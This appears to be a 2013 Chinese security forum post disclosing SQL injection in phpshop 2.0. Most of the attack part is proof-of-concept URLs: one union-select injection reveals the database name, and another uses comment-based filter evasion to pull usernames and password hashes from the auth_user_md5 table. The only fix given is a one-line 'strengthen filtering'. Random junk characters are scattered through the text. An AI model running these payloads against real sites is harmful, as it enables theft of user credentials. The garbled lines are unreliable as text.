找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2115|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability
  }  O( S# ~6 H( Z, i$ p3 X9 {: a' z+ O
作者 : By onestree) z! j  C) d  M$ `+ [' [) P0 P
下载地址 : http://code.google.com/p/phpshop/downloads/list
& n& \8 R  {( Q( Q' {测试地址: windows 7 / ubuntu
1 @. ?% |& \6 n4 e' n : }7 {" H. p+ o  ?* c
8 U8 N& d# K  L5 U
SQLi p0c:
- D, Y1 s( N3 m: I3 C9 m+ F9 r3 k 5 p0 d' S* d$ b& `
==================
# a4 y, ?3 e$ A: i! _  Y1 Z4 \ * ?( n2 [( \) [3 N. t
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
* O* m. }% O( m: J1 h: b, Junion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --7 p2 r1 h& q) @' m
% B7 a1 p& x6 p+ x
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--6 U" }% l; ]' x

. U- z+ h4 a$ `# o' ^. ^5 K0 m修复:% M: P1 r0 H& Y0 [2 m
加强过滤$ n- D* r( D7 n5 q9 ^% s+ q
​
5 j- W7 V# \- D1 `0 G3 q) O- C1 a7 _9 ~* n; ^& N
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表